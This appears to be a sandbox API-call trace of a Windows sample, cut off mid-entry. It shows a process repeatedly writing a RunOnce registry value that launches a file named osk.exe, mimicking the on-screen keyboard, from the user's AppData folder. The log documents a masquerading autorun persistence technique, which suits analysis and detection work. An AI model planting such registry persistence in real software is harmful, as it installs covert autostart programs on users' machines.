[0098.319] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.332] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.332] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.333] KillTimer (hWnd=0x20280, uIDEvent=0x22d9) returned 1 [0098.333] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.333] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.333] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.334] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.334] RegCloseKey (hKey=0x280) returned 0x0 [0098.334] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.334] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.334] SetTimer (hWnd=0x20280, nIDEvent=0x22da, uElapse=0xa, lpTimerFunc=0x0) returned 0x22da [0098.334] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.348] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.348] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.348] KillTimer (hWnd=0x20280, uIDEvent=0x22da) returned 1 [0098.349] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.349] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.349] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.349] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.350] RegCloseKey (hKey=0x280) returned 0x0 [0098.350] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.350] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.350] SetTimer (hWnd=0x20280, nIDEvent=0x22db, uElapse=0xa, lpTimerFunc=0x0) returned 0x22db [0098.350] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.363] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.364] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.364] KillTimer (hWnd=0x20280, uIDEvent=0x22db) returned 1 [0098.364] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.365] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.365] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.365] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.365] RegCloseKey (hKey=0x280) returned 0x0 [0098.365] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.365] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.366] SetTimer (hWnd=0x20280, nIDEvent=0x22dc, uElapse=0xa, lpTimerFunc=0x0) returned 0x22dc [0098.366] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0098.379] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.379] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.379] KillTimer (hWnd=0x20280, uIDEvent=0x22dc) returned 1 [0098.380] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.380] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.380] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.381] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.381] RegCloseKey (hKey=0x280) returned 0x0 [0098.381] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.381] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.381] SetTimer (hWnd=0x20280, nIDEvent=0x22dd, uElapse=0xa, lpTimerFunc=0x0) returned 0x22dd [0098.381] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.395] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.395] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.395] KillTimer (hWnd=0x20280, uIDEvent=0x22dd) returned 1 [0098.395] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.395] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.396] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.396] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.396] RegCloseKey (hKey=0x280) returned 0x0 [0098.396] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.396] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.396] SetTimer (hWnd=0x20280, nIDEvent=0x22de, uElapse=0xa, lpTimerFunc=0x0) returned 0x22de [0098.396] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.410] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.410] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.410] KillTimer (hWnd=0x20280, uIDEvent=0x22de) returned 1 [0098.411] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.411] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.411] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.411] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.412] RegCloseKey (hKey=0x280) returned 0x0 [0098.412] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.412] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.412] SetTimer (hWnd=0x20280, nIDEvent=0x22df, uElapse=0xa, lpTimerFunc=0x0) returned 0x22df [0098.412] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.426] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.426] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.426] KillTimer (hWnd=0x20280, uIDEvent=0x22df) returned 1 [0098.426] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.427] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.427] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.427] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.427] RegCloseKey (hKey=0x280) returned 0x0 [0098.427] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.427] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.427] SetTimer (hWnd=0x20280, nIDEvent=0x22e0, uElapse=0xa, lpTimerFunc=0x0) returned 0x22e0 [0098.427] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.441] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.441] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.442] KillTimer (hWnd=0x20280, uIDEvent=0x22e0) returned 1 [0098.442] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.442] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.442] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.442] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.443] RegCloseKey (hKey=0x280) returned 0x0 [0098.443] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.443] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.443] SetTimer (hWnd=0x20280, nIDEvent=0x22e1, uElapse=0xa, lpTimerFunc=0x0) returned 0x22e1 [0098.443] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.457] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.457] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.457] KillTimer (hWnd=0x20280, uIDEvent=0x22e1) returned 1 [0098.457] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.458] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.458] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.458] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.458] RegCloseKey (hKey=0x280) returned 0x0 [0098.458] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.458] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.458] SetTimer (hWnd=0x20280, nIDEvent=0x22e2, uElapse=0xa, lpTimerFunc=0x0) returned 0x22e2 [0098.458] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.473] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.473] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.473] KillTimer (hWnd=0x20280, 
uIDEvent=0x22e2) returned 1 [0098.473] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.473] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.474] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.474] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.474] RegCloseKey (hKey=0x280) returned 0x0 [0098.474] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.474] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.474] SetTimer (hWnd=0x20280, nIDEvent=0x22e3, uElapse=0xa, lpTimerFunc=0x0) returned 0x22e3 [0098.474] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.488] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.488] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.488] KillTimer (hWnd=0x20280, uIDEvent=0x22e3) returned 1 [0098.489] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.489] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.489] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.489] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.490] RegCloseKey (hKey=0x280) returned 0x0 [0098.490] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.490] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.490] SetTimer (hWnd=0x20280, nIDEvent=0x22e4, uElapse=0xa, lpTimerFunc=0x0) returned 0x22e4 [0098.490] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.504] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.504] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.504] KillTimer (hWnd=0x20280, uIDEvent=0x22e4) returned 1 [0098.504] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.505] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.505] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.505] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.505] RegCloseKey (hKey=0x280) returned 0x0 [0098.505] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.505] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.505] SetTimer (hWnd=0x20280, nIDEvent=0x22e5, uElapse=0xa, lpTimerFunc=0x0) returned 0x22e5 [0098.505] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.519] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.519] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.520] KillTimer (hWnd=0x20280, uIDEvent=0x22e5) returned 1 [0098.520] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0098.520] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.521] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.521] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.522] RegCloseKey (hKey=0x280) returned 0x0 [0098.522] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.522] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.522] SetTimer (hWnd=0x20280, nIDEvent=0x22e6, uElapse=0xa, lpTimerFunc=0x0) returned 0x22e6 [0098.522] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.535] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.535] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.536] KillTimer (hWnd=0x20280, uIDEvent=0x22e6) returned 1 [0098.536] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.536] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.536] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.537] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.537] RegCloseKey (hKey=0x280) returned 0x0 
[0098.537] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.537] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.537] SetTimer (hWnd=0x20280, nIDEvent=0x22e7, uElapse=0xa, lpTimerFunc=0x0) returned 0x22e7 [0098.537] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.551] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.551] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.551] KillTimer (hWnd=0x20280, uIDEvent=0x22e7) returned 1 [0098.551] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.552] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.552] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.552] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.552] RegCloseKey (hKey=0x280) returned 0x0 [0098.552] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.552] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.552] SetTimer (hWnd=0x20280, nIDEvent=0x22e8, uElapse=0xa, lpTimerFunc=0x0) returned 0x22e8 [0098.553] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.566] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.566] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.567] KillTimer (hWnd=0x20280, uIDEvent=0x22e8) returned 1 [0098.567] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.567] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.567] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.567] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.568] RegCloseKey (hKey=0x280) returned 0x0 [0098.568] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.568] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.568] SetTimer (hWnd=0x20280, nIDEvent=0x22e9, uElapse=0xa, lpTimerFunc=0x0) returned 0x22e9 [0098.568] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.582] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.582] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.582] KillTimer (hWnd=0x20280, uIDEvent=0x22e9) returned 1 [0098.582] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.583] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.583] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.583] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.583] RegCloseKey (hKey=0x280) returned 0x0 [0098.583] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.583] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.583] SetTimer (hWnd=0x20280, nIDEvent=0x22ea, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ea [0098.583] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.597] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.597] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.598] KillTimer (hWnd=0x20280, uIDEvent=0x22ea) returned 1 [0098.598] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.598] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.598] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.598] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.599] RegCloseKey (hKey=0x280) returned 0x0 [0098.599] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.599] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.599] SetTimer (hWnd=0x20280, nIDEvent=0x22eb, uElapse=0xa, lpTimerFunc=0x0) returned 0x22eb [0098.599] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.613] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.613] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.613] KillTimer (hWnd=0x20280, uIDEvent=0x22eb) returned 1 [0098.613] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.614] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.614] RegCreateKeyExA (in: hKey=0x80000001, 
